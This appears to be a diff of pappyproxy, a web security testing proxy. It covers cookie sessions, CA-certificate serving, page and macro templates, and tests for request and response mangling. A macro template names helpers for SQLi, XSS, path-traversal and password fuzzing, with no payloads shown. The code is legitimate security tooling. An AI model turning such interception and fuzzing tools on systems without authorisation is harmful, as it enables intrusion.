self.cookie_vals[v.key] = v
def set_cookie(key, val):
"""
set_cookie(key, val)
Set a cookie in the session. ``val`` can be either a string or a :class:`~pappyproxy.http.ResponseCookie`.
If a :class:`~pappyproxy.http.ResponseCookie` is used, make sure its ``key`` value is the same as
the key passed in to the function.
"""
self.cookie_vals[key] = val
def get_cookie(key):
"""
get_cookie(key)
Returns a string with the value of the cookie with the given string, even if the value is a :class:`~pappyproxy.http.ResponseCookie`.
If you want to get a :class:`~pappyproxy.http.ResponseCookie`, use :func:`~pappyproxy.session.Session.get_rsp_cookie`.
"""
if not key in self.cookie_vals:
raise KeyError('Cookie is not stored in session.')
v = self.cookie_vals[key]
return self._cookie_val(v)
def get_rsp_cookie(key):
"""
get_rsp_cookie(key)
Returns the :class:`~pappyproxy.http.ResponseCookie` associated with the key
regardless of if the value is stored as a string or a :class:`~pappyproxy.http.ResponseCookie`.
"""
if not key in self.cookie_vals:
raise KeyError('Cookie is not stored in session.')
v = self.cookie_vals[key]
return self._cookie_obj(key, v)

View file

@ -1,179 +0,0 @@
import os
import mimetypes
from .http import Request, Response
from .util import PappyStringTransport, PappyException
from twisted.test.proto_helpers import StringTransport
from twisted.web.server import Site, NOT_DONE_YET
from twisted.web import static
from twisted.web.resource import Resource, NoResource
from jinja2 import Environment, FileSystemLoader
from twisted.internet import defer
## The web server class
class PappyWebServer(object):
"""
A class that is used to serve pages for requests to http://pappy. It is a
ghetto wrapper around a twisted web Site object. Give it a request object
and it will add a response to it.
NOINDEX
"""
from pappyproxy.pappy import session
site_dir = session.config.pappy_dir+'/site'
loader = FileSystemLoader(site_dir)
env = Environment(loader=loader)
def __init__(self):
root = RootResource(self.site_dir)
self.site = Site(root)
@staticmethod
def render_template(*args, **kwargs):
return PappyWebServer.env.get_template(args[0]).render(args[1:], **kwargs).encode('utf-8')
@defer.inlineCallbacks
def handle_request(self, req):
protocol = self.site.buildProtocol(None)
tr = PappyStringTransport()
protocol.makeConnection(tr)
protocol.dataReceived(req.full_request)
tr.waitForProducers()
## WORKING HERE
# use loading functions to load response
yield tr.complete_deferred
rsp_raw = tr.value()
rsp = Response(rsp_raw)
req.response = rsp
## functions
def blocking_string_request(func):
"""
Wrapper for blocking request handlers in resources. The custom string
transport has a deferred that must be called back when the messege is
complete. If the message blocks though, you can just call it back right away
NOINDEX
"""
def f(self, request):
request.transport.complete_deferred.callback(None)
return func(self, request)
return f
## Resources
class PappyResource(Resource):
"""
Helper class for site resources.
NOINDEX
"""
def getChild(self, name, request):
if name == '':
return self
return Resource.getChild(self, name, request)
class RootResource(PappyResource):
def __init__(self, site_dir):
PappyResource.__init__(self)
self.site_dir = site_dir
self.dirListing = False
# Static resource
self.static_resource = NoDirFile(self.site_dir + '/static')
self.putChild('static', self.static_resource)
# Cert download resource
self.putChild('certs', CertResource())
# Response viewing resource
self.putChild('rsp', ResponseResource())
@blocking_string_request
def render_GET(self, request):
return PappyWebServer.render_template('index.html')
class NoDirFile(static.File):
def directoryListing(self):
return NoResource()
@blocking_string_request
def render_GET(self, request):
return static.File.render_GET(self, request)
## Cert resources
class CertResource(PappyResource):
def __init__(self):
PappyResource.__init__(self)
self.putChild('download', CertDownload())
@blocking_string_request
def render_GET(self, request):
return PappyWebServer.render_template('certs.html')
class CertDownload(PappyResource):
@blocking_string_request
def render_GET(self, request):
from .pappy import session
cert_dir = session.config.cert_dir
ssl_ca_file = session.config.ssl_ca_file
with open(os.path.join(cert_dir, ssl_ca_file), 'r') as f:
ca_raw = f.read()
request.responseHeaders.addRawHeader("Content-Type", "application/x-x509-ca-cert")
return ca_raw
## View responses
class ResponseResource(PappyResource):
def getChild(self, name, request):
if name == '':
return self
return ViewResponseResource(name)
@blocking_string_request
def render_GET(self, request):
return PappyWebServer.render_template('viewrsp.html')
class ViewResponseResource(PappyResource):
def __init__(self, reqid):
PappyResource.__init__(self)
self.reqid = reqid
def render_GET(self, request):
d = Request.load_request(self.reqid)
d.addCallback(self._render_response, request)
d.addErrback(self._render_response_err, request)
d.addCallback(lambda _: request.transport.complete_deferred.callback(None))
return NOT_DONE_YET
def _render_response(self, req, tw_request):
if req.response:
if not req.response.body:
raise PappyException("Response has no body")
if 'content-type' in req.response.headers:
tw_request.responseHeaders.addRawHeader("Content-Type", req.response.headers['content-type'])
else:
guess = mimetypes.guess_type(req.url)
if guess[0]:
tw_request.responseHeaders.addRawHeader("Content-Type", guess[0])
tw_request.write(req.response.body)
else:
tw_request.write(PappyWebServer.render_template('norsp.html'))
tw_request.finish()
def _render_response_err(self, err, tw_request):
tw_request.write(PappyWebServer.render_template('norsp.html', errmsg=err.getErrorMessage()))
tw_request.finish()
err.trap(Exception)

View file

@ -1,11 +0,0 @@
<html>
<head>
<title>Pappy</title>
</head>
<body style="background-color: #414141">
<div style="padding: 12pt; width:960px; margin:auto; background-color: #AAA">
<h1>Pappy</h1>
{% block body %}{% endblock %}
</div>
</body>
</html>

View file

@ -1,6 +0,0 @@
{% extends "base.html" %}
{% block body %}
<h2>Cert Download</h2>
Click <a href="/certs/download">here to download the CA cert.</a>
{% endblock %}

View file

@ -1,8 +0,0 @@
{% extends "base.html" %}
{% block body %}
<ul>
<li><a href="/certs">Certs</a></li>
<li>View responses in browser from <a href="http://pappy/rsp">http://pappy/rsp/&lt;reqid&gt;</a>
</ul>
{% endblock %}

View file

@ -1,8 +0,0 @@
{% extends "base.html" %}
{% block body %}
<h2>Unable To Return Response Body</h2>
{% if errmsg %}
<p>{{ errmsg }}</p>
{% endif %}
{% endblock %}

Binary file not shown.

Before

Width:  |  Height:  |  Size: 47 KiB

View file

@ -1 +0,0 @@
asdfasdfasdf

View file

@ -1,6 +0,0 @@
{% extends "base.html" %}
{% block body %}
<h2>View Response</h2>
<p>View http://pappy/rsp/&lt;id&gt; to view a response in your browser. The body of the response returned to your browser will be the same, but the headers will not.</p>
{% endblock %}

View file

@ -1,200 +0,0 @@
"""
Sorted collection for maintaining a sorted list.
Taken from http://code.activestate.com/recipes/577197-sortedcollection/
"""
from bisect import bisect_left, bisect_right
class SortedCollection(object):
'''Sequence sorted by a key function.
SortedCollection() is much easier to work with than using bisect() directly.
It supports key functions like those use in sorted(), min(), and max().
The result of the key function call is saved so that keys can be searched
efficiently.
Instead of returning an insertion-point which can be hard to interpret, the
five find-methods return a specific item in the sequence. They can scan for
exact matches, the last item less-than-or-equal to a key, or the first item
greater-than-or-equal to a key.
Once found, an item's ordinal position can be located with the index() method.
New items can be added with the insert() and insert_right() methods.
Old items can be deleted with the remove() method.
The usual sequence methods are provided to support indexing, slicing,
length lookup, clearing, copying, forward and reverse iteration, contains
checking, item counts, item removal, and a nice looking repr.
Finding and indexing are O(log n) operations while iteration and insertion
are O(n). The initial sort is O(n log n).
The key function is stored in the 'key' attibute for easy introspection or
so that you can assign a new key function (triggering an automatic re-sort).
In short, the class was designed to handle all of the common use cases for
bisect but with a simpler API and support for key functions.
>>> from pprint import pprint
>>> from operator import itemgetter
>>> s = SortedCollection(key=itemgetter(2))
>>> for record in [
... ('roger', 'young', 30),
... ('angela', 'jones', 28),
... ('bill', 'smith', 22),
... ('david', 'thomas', 32)]:
... s.insert(record)
>>> pprint(list(s)) # show records sorted by age
[('bill', 'smith', 22),
('angela', 'jones', 28),
('roger', 'young', 30),
('david', 'thomas', 32)]
>>> s.find_le(29) # find oldest person aged 29 or younger
('angela', 'jones', 28)
>>> s.find_lt(28) # find oldest person under 28
('bill', 'smith', 22)
>>> s.find_gt(28) # find youngest person over 28
('roger', 'young', 30)
>>> r = s.find_ge(32) # find youngest person aged 32 or older
>>> s.index(r) # get the index of their record
3
>>> s[3] # fetch the record at that index
('david', 'thomas', 32)
>>> s.key = itemgetter(0) # now sort by first name
>>> pprint(list(s))
[('angela', 'jones', 28),
('bill', 'smith', 22),
('david', 'thomas', 32),
('roger', 'young', 30)]
'''
def __init__(self, iterable=(), key=None):
self._given_key = key
key = (lambda x: x) if key is None else key
decorated = sorted((key(item), item) for item in iterable)
self._keys = [k for k, item in decorated]
self._items = [item for k, item in decorated]
self._key = key
def _getkey(self):
return self._key
def _setkey(self, key):
if key is not self._key:
self.__init__(self._items, key=key)
def _delkey(self):
self._setkey(None)
key = property(_getkey, _setkey, _delkey, 'key function')
def clear(self):
self.__init__([], self._key)
def copy(self):
return self.__class__(self, self._key)
def __len__(self):
return len(self._items)
def __getitem__(self, i):
return self._items[i]
def __iter__(self):
return iter(self._items)
def __reversed__(self):
return reversed(self._items)
def __repr__(self):
return '%s(%r, key=%s)' % (
self.__class__.__name__,
self._items,
getattr(self._given_key, '__name__', repr(self._given_key))
)
def __reduce__(self):
return self.__class__, (self._items, self._given_key)
def __contains__(self, item):
k = self._key(item)
i = bisect_left(self._keys, k)
j = bisect_right(self._keys, k)
return item in self._items[i:j]
def index(self, item):
'Find the position of an item. Raise ValueError if not found.'
k = self._key(item)
i = bisect_left(self._keys, k)
j = bisect_right(self._keys, k)
return self._items[i:j].index(item) + i
def count(self, item):
'Return number of occurrences of item'
k = self._key(item)
i = bisect_left(self._keys, k)
j = bisect_right(self._keys, k)
return self._items[i:j].count(item)
def insert(self, item):
'Insert a new item. If equal keys are found, add to the left'
k = self._key(item)
i = bisect_left(self._keys, k)
self._keys.insert(i, k)
self._items.insert(i, item)
def insert_right(self, item):
'Insert a new item. If equal keys are found, add to the right'
k = self._key(item)
i = bisect_right(self._keys, k)
self._keys.insert(i, k)
self._items.insert(i, item)
def remove(self, item):
'Remove first occurence of item. Raise ValueError if not found'
i = self.index(item)
del self._keys[i]
del self._items[i]
def find(self, k):
'Return first item with a key == k. Raise ValueError if not found.'
i = bisect_left(self._keys, k)
if i != len(self) and self._keys[i] == k:
return self._items[i]
raise ValueError('No item found with key equal to: %r' % (k,))
def find_le(self, k):
'Return last item with a key <= k. Raise ValueError if not found.'
i = bisect_right(self._keys, k)
if i:
return self._items[i-1]
raise ValueError('No item found with key at or below: %r' % (k,))
def find_lt(self, k):
'Return last item with a key < k. Raise ValueError if not found.'
i = bisect_left(self._keys, k)
if i:
return self._items[i-1]
raise ValueError('No item found with key below: %r' % (k,))
def find_ge(self, k):
'Return first item with a key >= equal to k. Raise ValueError if not found'
i = bisect_left(self._keys, k)
if i != len(self):
return self._items[i]
raise ValueError('No item found with key at or above: %r' % (k,))
def find_gt(self, k):
'Return first item with a key > k. Raise ValueError if not found'
i = bisect_right(self._keys, k)
if i != len(self):
return self._items[i]
raise ValueError('No item found with key above: %r' % (k,))

View file

@ -1,17 +0,0 @@
from pappyproxy.session import Session
MACRO_NAME = '{{macro_name}}'
SHORT_NAME = '{{short_name}}'
runargs = []
def init(args):
global runargs
runargs = args
def mangle_request(request):
global runargs
return request
def mangle_response(request):
global runargs
return request.response

View file

@ -0,0 +1,30 @@
{% include 'macroheader.py.tmpl' %}
{% if req_lines %}
###########
## Requests
# It's suggested that you call .copy() on these and then edit attributes
# as needed to create modified requests
##
{% for lines, params in zip(req_lines, req_params) %}
req{{ loop.index }} = parse_request(({% for line in lines %}
{{ line }}{% endfor %}
), {{ params }})
{% endfor %}{% endif %}
runargs = []
def init(client, args):
global runargs
runargs = args
def mangle_request(client, request):
global runargs
return request
def mangle_response(client, request, response):
global runargs
return response
def mangle_websocket(client, request, response, wsmessage):
global runargs
return wsmessage

View file

@ -1,31 +0,0 @@
{% include 'macroheader.py.template' %}
## Iterator cheat sheet:
# fuzz_path_trav() - Values for fuzzing path traversal
# fuzz_sqli() - Values for fuzzing SQLi
# fuzz_xss() - Values for fuzzing XSS
# common_passwords() - Common passwords
# common_usernames() - Common usernames
# fuzz_dirs() - Common web paths (ie /wp-admin)
{% if req_lines %}
###########
## Requests
# It's suggested that you call .copy() on these and then edit attributes
# as needed to create modified requests
##
{% set count = 1 %}{% for params, lines in zip(req_params, req_lines) %}
req{{ count }} = Request(({% for line in lines %}
'{{ line }}'{% endfor %}{% set count = count+1 %}
){{ params }})
{% endfor %}{% endif %}
def run_macro(args):
# Example:
# req = req1.copy() # Copy req1
# req.submit() # Submit the request to get a response
# print req.response.raw_headers # print the response headers
# req.save() # save the request to the data file
# or copy req1 into a loop and use string substitution to automate requests
pass

View file

@ -0,0 +1,22 @@
{% include 'macroheader.py.tmpl' %}
{% if req_lines %}
###########
## Requests
# It's suggested that you call .copy() on these and then edit attributes
# as needed to create modified requests
##
{% for lines, params in zip(req_lines, req_params) %}
req{{ loop.index }} = parse_request(({% for line in lines %}
{{ line }}{% endfor %}
), {{ params }})
{% endfor %}{% endif %}
def run_macro(client, args):
# Example:
"""
req = req1.copy() # Copy req1
client.submit(req) # Submit the request to get a response
print(req.response.full_message()) # print the response
client.save_new(req) # save the request to the data file
"""
pass

View file

@ -1,27 +0,0 @@
from pappyproxy.session import Session
MACRO_NAME = '{{macro_name}}'
SHORT_NAME = '{{short_name}}'
runargs = []
def init(args):
global runargs
runargs = args
def modify_header(msg, key, val):
"""
Modifies the header in a request or a response if it already exists in
the message
"""
if key in msg.headers:
msg.headers[key] = val
def mangle_request(request):
global runargs
modify_header(request, 'headername', 'headerval')
return request
def mangle_response(request):
global runargs
modify_header(request.response, 'headername', 'headerval')
return request.response

View file

@ -1,29 +0,0 @@
import sys
{% include 'macroheader.py.template' %}
from pappyproxy.http import submit_requests
def run_macro(args):
# Get IDs of in-context requests
reqids = main_context_ids()
reqids.reverse() # Resubmit earliest first
# Iterate over each request and submit it
to_submit = []
for rid in reqids:
req = request_by_id(rid).copy()
###################
# Modify `req` here
req.tags.add('resubmit')
to_submit.append(req)
#############################
# Modify resubmit params here
submit_requests(to_submit,
mangle=False,
save=False,
save_in_mem=False,
unique_paths=False,
unique_paths_and_args=False,
)

View file

@ -1,8 +0,0 @@
from pappyproxy.http import Request, get_request, post_request, request_by_id
from pappyproxy.plugin import main_context_ids
from pappyproxy.context import set_tag
from pappyproxy.session import Session
from pappyproxy.iter import *
MACRO_NAME = '{{macro_name}}'
SHORT_NAME = '{{short_name}}'

View file

@ -0,0 +1 @@
from pappyproxy.proxy import parse_request, parse_response

View file

@ -1,211 +0,0 @@
import pytest
import mock
import pappyproxy
from pappyproxy.mangle import async_mangle_request, async_mangle_response
from pappyproxy.http import Request, Response
from testutil import no_tcp, no_database, func_deleted, mock_deferred, mock_deep_save, fake_saving
def retf(r):
return False
@pytest.fixture
def ignore_edit(mocker):
new_edit = mock.MagicMock()
new_edit.return_value = mock_deferred(None)
new_plugin = mock.MagicMock()
new_plugin.return_value = new_edit
mocker.patch('pappyproxy.plugin.plugin_by_name', new=new_plugin)
@pytest.fixture
def ignore_delete(mocker):
new_os_remove = mock.MagicMock()
mocker.patch('os.remove', new=new_os_remove)
return new_os_remove
@pytest.fixture(autouse=True)
def no_logging(mocker):
mocker.patch('pappyproxy.proxy.log')
@pytest.fixture
def req():
r = Request()
r.start_line = 'GET / HTTP/1.1'
r.host = 'www.ffffff.eeeeee'
r.body = 'AAAA'
return r
@pytest.fixture
def req_w_rsp(req):
r = Response()
r.start_line = 'HTTP/1.1 200 OK'
r.headers['Test-Header'] = 'ABC123'
r.body = 'AAAA'
req.response = r
return req
@pytest.fixture
def mock_tempfile(mocker):
new_tfile_obj = mock.MagicMock()
tfile_instance = mock.MagicMock()
new_tfile_obj.return_value.__enter__.return_value = tfile_instance
tfile_instance.name = 'mockTemporaryFile'
mocker.patch('tempfile.NamedTemporaryFile', new=new_tfile_obj)
new_open = mock.MagicMock()
fake_file = mock.MagicMock(spec=file)
new_open.return_value.__enter__.return_value = fake_file
mocker.patch('__builtin__.open', new_open)
return (new_tfile_obj, tfile_instance, new_open, fake_file)
########################
## Test request mangling
@pytest.inlineCallbacks
def test_mangle_request_edit(req, mock_deep_save, mock_tempfile,
ignore_edit, ignore_delete):
tfile_obj, tfile_instance, new_open, fake_file = mock_tempfile
r = req
new_contents = ('GET / HTTP/1.1\r\n'
'Content-Length: 4\r\n\r\n'
'BBBB')
fake_file.read.return_value = new_contents
new_req = yield async_mangle_request(r)
assert not mock_deep_save.called
assert tfile_obj.called
assert tfile_instance.write.called
assert tfile_instance.write.call_args == ((r.full_request,),)
assert new_open.called
assert fake_file.read.called
assert new_req.full_request == new_contents
@pytest.inlineCallbacks
def test_mangle_request_edit_newlines(req, mock_deep_save, mock_tempfile,
ignore_edit, ignore_delete):
# Intercepting is off, request in scope
tfile_obj, tfile_instance, new_open, fake_file = mock_tempfile
r = req
new_contents = ('GET / HTTP/1.1\r\n'
'Test-Head: FOOBIE\n'
'Content-Length: 4\n\r\n'
'BBBB')
fake_file.read.return_value = new_contents
new_req = yield async_mangle_request(r)
assert new_req.full_request == ('GET / HTTP/1.1\r\n'
'Test-Head: FOOBIE\r\n'
'Content-Length: 4\r\n\r\n'
'BBBB')
assert new_req.headers['Test-Head'] == 'FOOBIE'
@pytest.inlineCallbacks
def test_mangle_request_drop(req, mock_deep_save, mock_tempfile,
ignore_edit, ignore_delete):
# Intercepting is off, request in scope
tfile_obj, tfile_instance, new_open, fake_file = mock_tempfile
r = req
new_contents = ''
fake_file.read.return_value = new_contents
new_req = yield async_mangle_request(r)
assert new_req is None
@pytest.inlineCallbacks
def test_mangle_request_edit_len(req, mock_deep_save, mock_tempfile,
ignore_edit, ignore_delete):
# Intercepting is off, request in scope
tfile_obj, tfile_instance, new_open, fake_file = mock_tempfile
r = req
new_contents = ('GET / HTTP/1.1\r\n'
'Test-Head: FOOBIE\n'
'Content-Length: 4\n\r\n'
'BBBBAAAA')
fake_file.read.return_value = new_contents
new_req = yield async_mangle_request(r)
assert new_req.full_request == ('GET / HTTP/1.1\r\n'
'Test-Head: FOOBIE\r\n'
'Content-Length: 8\r\n\r\n'
'BBBBAAAA')
#########################
## Test response mangling
@pytest.inlineCallbacks
def test_mangle_response_edit(req_w_rsp, mock_deep_save, mock_tempfile,
ignore_edit, ignore_delete):
# Intercepting is on, edit
tfile_obj, tfile_instance, new_open, fake_file = mock_tempfile
r = req_w_rsp
old_rsp = r.response.full_response
new_contents = ('HTTP/1.1 403 NOTOKIEDOKIE\r\n'
'Content-Length: 4\r\n'
'Other-Header: foobles\r\n\r\n'
'BBBB')
fake_file.read.return_value = new_contents
mangled_rsp = yield async_mangle_response(r)
assert not mock_deep_save.called
assert tfile_obj.called
assert tfile_instance.write.called
assert tfile_instance.write.call_args == ((old_rsp,),)
assert new_open.called
assert fake_file.read.called
assert mangled_rsp.full_response == new_contents
@pytest.inlineCallbacks
def test_mangle_response_newlines(req_w_rsp, mock_deep_save, mock_tempfile,
ignore_edit, ignore_delete):
# Intercepting is off, request in scope
tfile_obj, tfile_instance, new_open, fake_file = mock_tempfile
r = req_w_rsp
old_rsp = r.response.full_response
new_contents = ('HTTP/1.1 403 NOTOKIEDOKIE\n'
'Content-Length: 4\n'
'Other-Header: foobles\r\n\n'
'BBBB')
fake_file.read.return_value = new_contents
mangled_rsp = yield async_mangle_response(r)
assert mangled_rsp.full_response == ('HTTP/1.1 403 NOTOKIEDOKIE\r\n'
'Content-Length: 4\r\n'
'Other-Header: foobles\r\n\r\n'
'BBBB')
assert mangled_rsp.headers['Other-Header'] == 'foobles'
@pytest.inlineCallbacks
def test_mangle_response_drop(req_w_rsp, mock_deep_save, mock_tempfile,
ignore_edit, ignore_delete):
# Intercepting is off, request in scope
tfile_obj, tfile_instance, new_open, fake_file = mock_tempfile
r = req_w_rsp
old_rsp = r.response.full_response
new_contents = ''
fake_file.read.return_value = new_contents
mangled_rsp = yield async_mangle_response(r)
assert mangled_rsp is None
@pytest.inlineCallbacks
def test_mangle_response_new_len(req_w_rsp, mock_deep_save, mock_tempfile,
ignore_edit, ignore_delete):
# Intercepting is off, request in scope
tfile_obj, tfile_instance, new_open, fake_file = mock_tempfile
r = req_w_rsp
old_rsp = r.response.full_response
new_contents = ('HTTP/1.1 403 NOTOKIEDOKIE\n'
'Content-Length: 4\n'
'Other-Header: foobles\r\n\n'
'BBBBAAAA')
fake_file.read.return_value = new_contents
mangled_rsp = yield async_mangle_response(r)
assert mangled_rsp.full_response == ('HTTP/1.1 403 NOTOKIEDOKIE\r\n'
'Content-Length: 8\r\n'
'Other-Header: foobles\r\n\r\n'
'BBBBAAAA')

View file

@ -1,124 +0,0 @@
import base64
import pytest
import mock
import json
import datetime
import pappyproxy
from pappyproxy.util import PappyException
from pappyproxy.comm import CommServer
from pappyproxy.http import Request, Response
from testutil import mock_deferred, func_deleted, TLSStringTransport, freeze, mock_int_macro, no_tcp
@pytest.fixture(autouse=True)
def no_int_macros(mocker):
mocker.patch('pappyproxy.plugin.active_intercepting_macros').return_value = {}
@pytest.fixture
def http_request():
req = Request('GET / HTTP/1.1\r\n\r\n')
req.host = 'www.foo.faketld'
req.port = '1337'
req.is_ssl = True
req.reqid = 123
rsp = Response('HTTP/1.1 200 OK\r\n\r\n')
req.response = rsp
return req
def perform_comm(line):
serv = CommServer()
serv.transport = TLSStringTransport()
serv.lineReceived(line)
n = datetime.datetime.now()
while serv.transport.value() == '':
t = datetime.datetime.now()
if (t-n).total_seconds() > 5:
raise Exception("Request timed out")
return serv.transport.value()
def test_simple():
v = perform_comm('{"action": "ping"}')
assert json.loads(v) == {'ping': 'pong', 'success': True}
def mock_loader(rsp):
def f(*args, **kwargs):
return rsp
return classmethod(f)
def mock_submitter(rsp):
def f(_, req, *args, **kwargs):
req.response = rsp
req.reqid = 123
return mock_deferred(req)
return classmethod(f)
def mock_loader_fail():
def f(*args, **kwargs):
raise PappyException("lololo message don't exist dawg")
return classmethod(f)
def test_get_request(mocker, http_request):
mocker.patch.object(pappyproxy.http.Request, 'load_request', new=mock_loader(http_request))
v = perform_comm('{"action": "get_request", "reqid": "1"}')
expected_data = json.loads(http_request.to_json())
expected_data['success'] = True
assert json.loads(v) == expected_data
def test_get_request_fail(mocker, http_request):
mocker.patch.object(pappyproxy.http.Request, 'load_request', new=mock_loader_fail())
v = json.loads(perform_comm('{"action": "get_request", "reqid": "1"}'))
assert v['success'] == False
assert 'message' in v
def test_get_response(mocker, http_request):
mocker.patch.object(pappyproxy.http.Request, 'load_request', new=mock_loader(http_request))
mocker.patch.object(pappyproxy.http.Response, 'load_response', new=mock_loader(http_request.response))
v = perform_comm('{"action": "get_response", "reqid": "1"}')
expected_data = json.loads(http_request.response.to_json())
expected_data['success'] = True
assert json.loads(v) == expected_data
def test_get_response_fail(mocker, http_request):
mocker.patch.object(pappyproxy.http.Request, 'load_request', new=mock_loader(http_request))
mocker.patch.object(pappyproxy.http.Response, 'load_response', new=mock_loader_fail())
v = json.loads(perform_comm('{"action": "get_response", "reqid": "1"}'))
assert v['success'] == False
assert 'message' in v
def test_submit_request(mocker, http_request):
rsp = Response('HTTP/1.1 200 OK\r\n\r\n')
mocker.patch.object(pappyproxy.http.Request, 'submit_request', new=mock_submitter(rsp))
mocker.patch('pappyproxy.http.Request.async_deep_save').return_value = mock_deferred()
comm_data = {"action": "submit"}
comm_data['host'] = http_request.host
comm_data['port'] = http_request.port
comm_data['is_ssl'] = http_request.is_ssl
comm_data['full_message'] = base64.b64encode(http_request.full_message)
comm_data['tags'] = ['footag']
v = perform_comm(json.dumps(comm_data))
expected_data = {}
expected_data[u'request'] = json.loads(http_request.to_json())
expected_data[u'response'] = json.loads(http_request.response.to_json())
expected_data[u'success'] = True
expected_data[u'request'][u'tags'] = [u'footag']
assert json.loads(v) == expected_data
def test_submit_request_fail(mocker, http_request):
mocker.patch.object(pappyproxy.http.Request, 'submit_request', new=mock_loader_fail())
mocker.patch('pappyproxy.http.Request.async_deep_save').return_value = mock_deferred()
comm_data = {"action": "submit"}
comm_data['full_message'] = base64.b64encode('HELLO THIS IS REQUEST\r\nWHAT IS HEADER FORMAT\r\n')
v = json.loads(perform_comm(json.dumps(comm_data)))
print v
assert v['success'] == False
assert 'message' in v

View file

@ -1,391 +0,0 @@
import pytest
from pappyproxy import context
from pappyproxy.http import Request, Response, ResponseCookie
@pytest.fixture
def http_request():
return Request('GET / HTTP/1.1\r\n')
def test_filter_reqs():
pass
def test_gen_filter_by_all_request():
f = context.gen_filter_by_all(['ct', 'hello'])
fn = context.gen_filter_by_all(['nct', 'hello'])
# Nowhere
r = Request('GET / HTTP/1.1\r\n')
assert not f(r)
assert fn(r)
# Verb
r = Request('hello / HTTP/1.1\r\n')
assert f(r)
assert not fn(r)
# Path
r = Request('GET /hello HTTP/1.1\r\n')
assert f(r)
assert not fn(r)
# Data
r = Request('GET / HTTP/1.1\r\n')
r.body = 'hello'
assert f(r)
assert not fn(r)
# Header key
r = Request('GET / HTTP/1.1\r\n')
r.headers['hello'] = 'goodbye'
assert f(r)
assert not fn(r)
# Header value
r = Request('GET / HTTP/1.1\r\n')
r.headers['goodbye'] = 'hello'
assert f(r)
assert not fn(r)
# Nowhere in headers
r = Request('GET / HTTP/1.1\r\n')
r.headers['goodbye'] = 'for real'
assert not f(r)
assert fn(r)
# Cookie key
r = Request('GET / HTTP/1.1\r\n')
r.cookies['hello'] = 'world'
assert f(r)
assert not fn(r)
# Cookie value
r = Request('GET / HTTP/1.1\r\n')
r.cookies['world'] = 'hello'
assert f(r)
assert not fn(r)
# Nowhere in cookie
r = Request('GET / HTTP/1.1\r\n')
r.cookies['world'] = 'sucks'
assert not f(r)
assert fn(r)
def test_gen_filter_by_all_response(http_request):
f = context.gen_filter_by_all(['ct', 'hello'])
fn = context.gen_filter_by_all(['nct', 'hello'])
# Nowhere
r = Response('HTTP/1.1 200 OK\r\n')
http_request.response = r
assert not f(http_request)
assert fn(http_request)
# Response text
r = Response('HTTP/1.1 200 hello\r\n')
http_request.response = r
assert f(http_request)
assert not fn(http_request)
# Data
r = Response('HTTP/1.1 200 OK\r\n')
http_request.response = r
r.body = 'hello'
assert f(http_request)
assert not fn(http_request)
# Header key
r = Response('HTTP/1.1 200 OK\r\n')
http_request.response = r
r.headers['hello'] = 'goodbye'
assert f(http_request)
assert not fn(http_request)
# Header value
r = Response('HTTP/1.1 200 OK\r\n')
http_request.response = r
r.headers['goodbye'] = 'hello'
assert f(http_request)
assert not fn(http_request)
# Nowhere in headers
r = Response('HTTP/1.1 200 OK\r\n')
http_request.response = r
r.headers['goodbye'] = 'for real'
assert not f(http_request)
assert fn(http_request)
# Cookie key
r = Response('HTTP/1.1 200 OK\r\n')
http_request.response = r
r.add_cookie(ResponseCookie('hello=goodbye'))
assert f(http_request)
assert not fn(http_request)
# Cookie value
r = Response('HTTP/1.1 200 OK\r\n')
http_request.response = r
r.add_cookie(ResponseCookie('goodbye=hello'))
assert f(http_request)
assert not fn(http_request)
# Nowhere in cookie
r = Response('HTTP/1.1 200 OK\r\n')
http_request.response = r
r.add_cookie(ResponseCookie('goodbye=for real'))
assert not f(http_request)
assert fn(http_request)
def test_filter_by_host(http_request):
f = context.gen_filter_by_host(['ct', 'sexy'])
fn = context.gen_filter_by_host(['nct', 'sexy'])
http_request.headers['Host'] = 'google.com'
http_request.headers['MiscHeader'] = 'vim.sexy'
assert not f(http_request)
assert fn(http_request)
http_request.headers['Host'] = 'vim.sexy'
assert http_request.host == 'vim.sexy'
assert f(http_request)
assert not fn(http_request)
def test_filter_by_body():
f = context.gen_filter_by_body(['ct', 'sexy'])
fn = context.gen_filter_by_body(['nct', 'sexy'])
# Test request bodies
r = Request()
r.start_line = 'GET /sexy HTTP/1.1'
r.headers['Header'] = 'sexy'
r.body = 'foo'
assert not f(r)
assert fn(r)
r.body = 'sexy'
assert f(r)
assert not fn(r)
# Test response bodies
r = Request()
rsp = Response()
rsp.start_line = 'HTTP/1.1 200 OK'
rsp.headers['sexy'] = 'sexy'
r.start_line = 'GET /sexy HTTP/1.1'
r.headers['Header'] = 'sexy'
r.response = rsp
assert not f(r)
assert fn(r)
rsp.body = 'sexy'
assert f(r)
assert not fn(r)
def test_filter_by_response_code(http_request):
f = context.gen_filter_by_response_code(['eq', '200'])
fn = context.gen_filter_by_response_code(['neq', '200'])
r = Response()
http_request.response = r
r.start_line = 'HTTP/1.1 404 Not Found'
assert not f(http_request)
assert fn(http_request)
r.start_line = 'HTTP/1.1 200 OK'
assert f(http_request)
assert not fn(http_request)
def test_filter_by_raw_headers_request():
f1 = context.gen_filter_by_raw_headers(['ct', 'Sexy:'])
fn1 = context.gen_filter_by_raw_headers(['nct', 'Sexy:'])
f2 = context.gen_filter_by_raw_headers(['ct', 'sexy\r\nHeader'])
fn2 = context.gen_filter_by_raw_headers(['nct', 'sexy\r\nHeader'])
r = Request('GET / HTTP/1.1\r\n')
rsp = Response('HTTP/1.1 200 OK\r\n')
r.response = rsp
r.headers['Header'] = 'Sexy'
assert not f1(r)
assert fn1(r)
assert not f2(r)
assert fn2(r)
r = Request('GET / HTTP/1.1\r\n')
rsp = Response('HTTP/1.1 200 OK\r\n')
r.response = rsp
r.headers['Sexy'] = 'sexy'
assert f1(r)
assert not fn1(r)
assert not f2(r)
assert fn2(r)
r.headers['OtherHeader'] = 'sexy'
r.headers['Header'] = 'foo'
assert f1(r)
assert not fn1(r)
assert f2(r)
assert not fn2(r)
def test_filter_by_raw_headers_response():
f1 = context.gen_filter_by_raw_headers(['ct', 'Sexy:'])
fn1 = context.gen_filter_by_raw_headers(['nct', 'Sexy:'])
f2 = context.gen_filter_by_raw_headers(['ct', 'sexy\r\nHeader'])
fn2 = context.gen_filter_by_raw_headers(['nct', 'sexy\r\nHeader'])
r = Request('GET / HTTP/1.1\r\n')
rsp = Response('HTTP/1.1 200 OK\r\n')
r.response = rsp
rsp.headers['Header'] = 'Sexy'
assert not f1(r)
assert fn1(r)
assert not f2(r)
assert fn2(r)
r = Request('GET / HTTP/1.1\r\n')
rsp = Response('HTTP/1.1 200 OK\r\n')
r.response = rsp
rsp.headers['Sexy'] = 'sexy'
assert f1(r)
assert not fn1(r)
assert not f2(r)
assert fn2(r)
